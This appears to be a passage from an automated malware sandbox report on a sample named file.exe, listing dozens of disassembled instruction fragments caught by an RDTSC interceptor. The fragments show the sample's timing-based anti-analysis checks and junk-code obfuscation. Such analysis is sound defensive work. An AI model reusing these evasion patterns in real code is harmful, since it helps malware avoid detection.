0x00000059 jmp 00007FBE44D6BDB6h 0x0000005e popad 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D62B1 second address: 5D62B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5AFE second address: 5D5B08 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBE44D6BDACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D62B6 second address: 5D62BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D62BB second address: 5D633A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FBE44D6BDA8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 or dword ptr [ebp+122D27C2h], ecx 0x0000002c push 00000000h 0x0000002e pushad 0x0000002f jmp 00007FBE44D6BDAAh 0x00000034 jng 00007FBE44D6BDA8h 0x0000003a push ecx 0x0000003b pop eax 0x0000003c popad 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007FBE44D6BDA8h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 0000001Ah 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 xchg eax, ebx 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007FBE44D6BDB1h 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D75CE second address: 5D75D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D75D3 second address: 5D7603 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D6BDB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBE44D6BDB6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D8395 second address: 5D8431 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBE44CEB6D8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FBE44CEB6D8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 push esi 0x00000028 call 00007FBE44CEB6E5h 0x0000002d jmp 00007FBE44CEB6DDh 0x00000032 pop esi 0x00000033 pop edi 0x00000034 mov dword ptr [ebp+122D2B66h], eax 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push esi 0x00000041 call 00007FBE44CEB6D8h 0x00000046 pop esi 0x00000047 mov dword ptr [esp+04h], esi 0x0000004b add dword ptr [esp+04h], 0000001Bh 0x00000053 inc esi 0x00000054 push esi 0x00000055 ret 0x00000056 pop esi 0x00000057 ret 0x00000058 push eax 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FBE44CEB6E9h 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7603 second address: 5D7608 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9002 second address: 5D9081 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44CEB6DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FBE44CEB6D8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D24EAh], ecx 0x0000002a mov dword ptr [ebp+122D2485h], edi 0x00000030 push 00000000h 0x00000032 jnl 00007FBE44CEB6DAh 0x00000038 adc si, 9415h 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007FBE44CEB6D8h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 0000001Dh 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 stc 0x0000005a push eax 0x0000005b push ebx 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9B75 second address: 5D9B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D98C1 second address: 5D98C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9B79 second address: 5D9B87 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBE44D6BDA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9B87 second address: 5D9B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59693E second address: 59695D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 ja 00007FBE44D6BDA6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007FBE44D6BDAEh 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59695D second address: 596963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 596963 second address: 596967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DDE83 second address: 5DDE9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBE44CEB6E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DED67 second address: 5DED6D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DFEC2 second address: 5DFECC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FBE44CEB6D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DEFBA second address: 5DEFBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DFECC second address: 5DFF24 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FBE44CEB6D8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 00000000h 0x00000027 jmp 00007FBE44CEB6E0h 0x0000002c xor dword ptr [ebp+1246E298h], edx 0x00000032 push 00000000h 0x00000034 xor di, 18A0h 0x00000039 push eax 0x0000003a jo 00007FBE44CEB6E0h 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DEFBE second address: 5DEFC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DEFC4 second address: 5DEFC9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DEFC9 second address: 5DEFD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E0E31 second address: 5E0E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DEFD7 second address: 5DEFDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E0E37 second address: 5E0E3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DEFDB second address: 5DEFE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DEFE1 second address: 5DF092 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FBE444F40B8h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FBE444F40A8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov dword ptr [ebp+12455376h], edi 0x0000002c sub dword ptr [ebp+124772CEh], eax 0x00000032 push dword ptr fs:[00000000h] 0x00000039 push ecx 0x0000003a mov ebx, dword ptr [ebp+122D2E70h] 0x00000040 pop edi 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 sub dword ptr [ebp+122D3CBDh], edx 0x0000004e mov eax, dword ptr [ebp+122D01A9h] 0x00000054 push 00000000h 0x00000056 push edx 0x00000057 call 00007FBE444F40A8h 0x0000005c pop edx 0x0000005d mov dword ptr [esp+04h], edx 0x00000061 add dword ptr [esp+04h], 0000001Ah 0x00000069 inc edx 0x0000006a push edx 0x0000006b ret 0x0000006c pop edx 0x0000006d ret 0x0000006e add bl, 00000071h 0x00000071 push FFFFFFFFh 0x00000073 nop 0x00000074 push ebx 0x00000075 jmp 00007FBE444F40B0h 0x0000007a pop ebx 0x0000007b push eax 0x0000007c push eax 0x0000007d push eax 0x0000007e push edx 0x0000007f jno 00007FBE444F40A6h 0x00000085 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E107F second address: 5E1084 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E1084 second address: 5E10A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBE444F40B8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E10A7 second address: 5E10AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E2F3F second address: 5E2F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E2F43 second address: 5E2F47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E214C second address: 5E2150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E4007 second address: 5E4020 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D3A545h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E8E17 second address: 5E8E25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E70BA second address: 5E70BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E8162 second address: 5E8166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E8F2A second address: 5E8F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EAC9B second address: 5EAC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EAC9F second address: 5EACB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBE44D3A542h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EACB9 second address: 5EACBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EAD4B second address: 5EAD4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E61BD second address: 5E61C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E61C1 second address: 5E61C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E61C5 second address: 5E61CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E9FD0 second address: 5E9FED instructions: 0x00000000 rdtsc 0x00000002 js 00007FBE44D3A538h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e pushad 0x0000000f jmp 00007FBE44D3A53Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E9FED second address: 5EA051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 nop 0x00000007 mov di, E33Ch 0x0000000b push dword ptr fs:[00000000h] 0x00000012 mov di, CF75h 0x00000016 mov dword ptr fs:[00000000h], esp 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FBE444F40A8h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 mov eax, dword ptr [ebp+122D0CB1h] 0x0000003d push ebx 0x0000003e mov dword ptr [ebp+122D2752h], ecx 0x00000044 pop ebx 0x00000045 push FFFFFFFFh 0x00000047 xor dword ptr [ebp+122D240Fh], edx 0x0000004d nop 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FBE444F40ACh 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EA051 second address: 5EA06D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FBE44D3A53Ch 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d jng 00007FBE44D3A53Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5ECD3F second address: 5ECDB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov dword ptr [ebp+122D27DDh], ecx 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007FBE444F40A8h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 push 00000000h 0x00000037 pushad 0x00000038 and esi, dword ptr [ebp+122D2E4Ch] 0x0000003e sbb al, 00000016h 0x00000041 popad 0x00000042 push eax 0x00000043 pushad 0x00000044 jnp 00007FBE444F40A8h 0x0000004a push ebx 0x0000004b pop ebx 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FBE444F40B3h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5ECF08 second address: 5ECF0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5ECF0E second address: 5ECF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F7CD9 second address: 5F7D21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBE44D3A546h 0x00000008 je 00007FBE44D3A536h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jns 00007FBE44D3A54Ch 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F7D21 second address: 5F7D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE444F40B6h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F7D3C second address: 5F7D61 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007FBE44D3A541h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F7D61 second address: 5F7D6B instructions: 0x00000000 rdtsc 0x00000002 js 00007FBE444F40ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FD3FC second address: 5FD424 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBE44D3A53Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBE44D3A546h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FD424 second address: 5FD428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FD428 second address: 5FD42C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FDA66 second address: 5FDA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FDA6A second address: 5FDA6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FDA6E second address: 5FDA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FDD52 second address: 5FDD68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FBE44D3A538h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FDD68 second address: 5FDD6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FDD6C second address: 5FDD87 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBE44D3A536h 0x00000008 jmp 00007FBE44D3A541h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FDD87 second address: 5FDD8C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FDF35 second address: 5FDF3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBE44D3A536h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FE078 second address: 5FE07C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FE07C second address: 5FE0AC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBE44D3A536h 0x00000008 jnl 00007FBE44D3A536h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 jmp 00007FBE44D3A542h 0x00000016 jp 00007FBE44D3A536h 0x0000001c pop ecx 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FE0AC second address: 5FE0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FBE444F40A6h 0x0000000a jbe 00007FBE444F40A6h 0x00000010 popad 0x00000011 jmp 00007FBE444F40ADh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FE4A8 second address: 5FE4C8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBE44D3A536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FBE44D3A546h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6028FF second address: 602921 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FBE444F40A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 602A79 second address: 602A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 602A83 second address: 602A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 602A8A second address: 602A8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 602BEC second address: 602C02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE444F40AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FBE444F40AEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 602C02 second address: 602C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 602C08 second address: 602C41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FBE444F40A6h 0x00000009 jng 00007FBE444F40A6h 0x0000000f jmp 00007FBE444F40ACh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FBE444F40B9h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 602F50 second address: 602F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 602F56 second address: 602F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 602F5A second address: 602F6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44D3A53Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 603364 second address: 60336E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBE444F40A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
